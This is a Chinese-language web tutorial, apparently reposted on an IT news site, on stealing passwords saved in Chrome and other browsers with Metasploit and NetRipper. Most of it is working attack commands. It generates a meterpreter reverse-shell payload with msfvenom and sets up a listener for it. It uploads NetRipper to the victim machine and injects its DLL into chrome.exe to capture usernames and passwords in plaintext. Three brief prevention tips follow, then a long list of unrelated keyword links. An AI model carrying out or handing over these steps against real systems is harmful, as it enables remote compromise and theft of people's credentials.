如何进行Metasploit+NetRipper获取Chrome等浏览器帐号密码测试
发表于:2025-02-23 作者:千家信息网编辑
千家信息网最后更新 2025年02月23日,如何进行Metasploit+NetRipper获取Chrome等浏览器帐号密码测试,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能
千家信息网最后更新 2025年02月23日如何进行Metasploit+NetRipper获取Chrome等浏览器帐号密码测试1.下载并且配置NetRipper
5.测试验证
如何进行Metasploit+NetRipper获取Chrome等浏览器帐号密码测试,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。
前言
我将手把手教会各位Buffer如何使用Metasploit+NetRipper获取Chrome等浏览器内保存的帐号密码。
需要工具:
Kali Linux&Metasploit
NetRipper
1.下载并且配置NetRipper
git clone https://github.com/NytroRST/NetRipper.git
mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper
cp netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper/
cp DLL.x86.dll NetRipper.x86.exe /usr/share/metasploit-framework/modules/post/windows/gather/netripper/
cp DLL.x64.dll NetRipper.x64.exe /usr/share/metasploit-framework/modules/post/windows/gather/netripper/
2.生成Windows的Payload用于建立于目标机器的连接
msfvenom -p windows/meterpreter/reverse_tcp LHOST=You IP LPORT=XXXX -f exe > Payload.exe
3.启动Metasploit并且进行监听
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST IP
set LPORT 6666
options
exploit
目标机运行Payload获取到反弹shell
4.上传DLL和exe文件到目标机器的C:\Users\Administrator\AppData\Local\Temp目录下
Upload /root/Desjtop/NetRipper/x64/DLL.dllUpload /root/Desjtop/NetRipper/x64/NetRipper.exe
shell
NetRipper.exe
运行NetRipper.exe
NetRipper.exe -w DLL.dll -l TEMP -p true -d 4096 -s user,pass
NetRipper.exe ConfiguredDLL.dll chrome.exe
我注入到了是chrome浏览器的进程,你也可以注入到其他浏览器(火狐,QQ浏览器,360浏览器等等)的进程,这里以Chrom浏览器为主
5.测试验证
打开那个刚刚下载的txt文件
Ctir+F输入pwpw或者pwd、pass、password等关键词来搜索明文密码
如果获取失败帐号密码的话,可能是网站使用了Https协议,或者登陆时在本地就进行了帐号口令的一个加密混淆!(个人推断) 防范方法:
1.不要点击来历不明的文件
2.浏览器登录可以扫描就扫描登录
3.如果没有必要个人建议不要在浏览器保存自己的社交帐号密码
看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注行业资讯频道,感谢您对的支持。
浏览器
浏览
密码
帐号
文件
目标
测试
个人
机器
进程
帮助
登录
运行
清楚
必要
手把手
来历不明
关键
关键词
内容
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
数据库列属性标识规范是
数据库连接操作有几种
大学生交友软件开发方案
计算机网络技术要不要手提电脑
南通定制软件开发
qpcr引物数据库
零基础如何学习软件开发
宁波云软件开发需要学什么
本科web服务器难度
红警手游无法连接到服务器
长春分销软件开发公司
海康威视内部研究院数据库
网络安全高中班会教案怎么写
数据库中姓名可采用默认值吗
软件开发的gem
腾讯云轻量服务器怎么重置系统
上海高科技软件开发模型设计
扬州应用软件开发项目
网络安全新系统逻辑方案
新华互联网科技 上海
江西省网络安全教育周
局域网服务器如何做加速
服务器维护好还是关机好
网络技术实践课程
数据库挖掘有什么用
美国 网络安全法 全文
软件开发服务生产厂家
服务器安全组是什么原因
数据库会话状态
数据库 密码 保存